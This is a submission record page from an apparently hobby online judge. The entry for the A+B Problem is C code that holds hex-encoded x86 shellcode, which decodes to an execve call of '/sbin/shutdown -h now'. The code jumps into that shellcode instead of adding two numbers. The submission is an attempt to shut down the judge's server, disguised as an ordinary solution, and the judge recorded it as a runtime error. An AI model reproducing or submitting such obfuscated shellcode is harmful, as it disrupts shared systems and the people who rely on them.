提交记录 17194


用户 题目 状态 得分 用时 内存 语言 代码长度
Hurrison 1000i. 【传统题】 A+B Problem Runtime Error 0 4.83 us 8 KB C++11 374 B
提交时间 评测时间
2021-12-05 19:57:27 2021-12-05 19:57:28
#include <stdio.h>
#include <string.h>

unsigned char code[] =  "\x31\xc0\x31\xd2\x50\x66\x68\x2d"
"\x68\x89\xe7\x50\x6a\x6e\x66\xc7"
"\x44\x24\x01\x6f\x77\x89\xe7\x50"
"\x68\x64\x6f\x77\x6e\x68\x73\x68"
"\x75\x74\x68\x6e\x2f\x2f\x2f\x68"
"\x2f\x73\x62\x69\x89\xe3\x52\x56"
"\x57\x53\x89\xe1\xb0\x0b\xcd\x80";

int
main() {
int (*ret)() = (int(*)())code;
ret();

return 0;
}

CompilationN/AN/ACompile OKScore: N/A

Testcase #14.83 us8 KBRuntime ErrorScore: 0


Judge Duck Online | 评测鸭在线
Server Time: 2024-04-26 15:25:55 | Loaded in 1 ms | Server Status
个人娱乐项目,仅供学习交流使用